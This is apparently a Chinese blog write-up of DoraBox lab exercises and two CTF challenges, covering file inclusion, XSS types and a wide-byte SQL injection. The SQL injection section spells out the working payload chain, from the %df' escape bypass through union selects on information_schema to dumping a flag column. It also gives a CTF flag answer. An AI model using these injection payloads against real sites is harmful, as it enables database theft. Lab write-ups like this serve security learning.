DoraBox——文件包含、XSS跨站、两道ctf题

1.任意文件包含
这道题没有什么特别的限制,代码中使用include直接包含的,直接输入:txt.txt 在这里插入图片描述
2.目录限制文件包含
随便输入:php,发现include()里与原来相比多了一个“./”,所以直接访问./txt.txt在这里插入图片描述
3.XSS 反射型
它指的是攻击者向目标网站中插入恶意代码(但恶意代码并未保存在目标网站中),只有当用户浏览该页面时,通过欺骗用户让用户自己点击链接(攻击者事先准备好的链接),才会触发恶意代码进行攻击。
输入框中输入:
在这里插入图片描述在这里插入图片描述
查看源码进行比较,发现输入的代码被插入了源代码中,但是每次重新进入网页时,如果不输入代码,则源码中并不会出现第一次插入的代码在这里插入图片描述在这里插入图片描述
4.XSS 存储型
与反射型类似,但是存储型是只要用户浏览了包含此恶意代码的页面,就会触发恶意代码进行执行,并且存储型XSS是永久存储在服务器中的。
向输入框中输入:
在这里插入图片描述
与反射型不同的是,当我重新进入页面时,不需要再次输入,就会直接弹框,并且查看源码会发现,插入的代码并不会因为重新进入页面就从源码中消失。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
5.XSS DOM型
还是向输入框中输入:
在这里插入图片描述
回车后出现弹窗
在这里插入图片描述
查看源码,发现输入的代码并未插入源码中,但是源码中有之前两种类型中没有的代码,这道题目前还不会。。。
在这里插入图片描述
6.sql injection 3 (SQL注入题)
输入:id=1’,发现被转义了,使用%df’宽字节注入
输入:id=1%df’,报错在这里插入图片描述
输入:id=1%df’or 1=1%23,回显正常
开始查询字段数,输入:id=1%df’order by 2%23,回显正常
输入:id=1%df’order by 3 %23,报错,所以一共有2个字段在这里插入图片描述在这里插入图片描述
判断字段中有输出的位置:id=-1%df’union select 1,2 %23在这里插入图片描述
开始爆数据库:id=-1%df’union select 1,database() %23在这里插入图片描述
开始爆表名:id=-1%df’union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572)%23
(0x7361652d6368696e616c6f766572为库名sae-chinalover转化成的16进制数)
在这里插入图片描述
根据提示,开始爆表ctf4当中的所有字段名:id=-1%df’union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x63746634)%23
在这里插入图片描述
爆ctf4表中的字段flag中的数据:id=-1%df’union select 1,flag from ctf4%23在这里插入图片描述
得到flag
7.easy!
在这里插入图片描述
随便找一个base64解密工具,解密后得到flag: nctf{this_is_base64_encode}

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值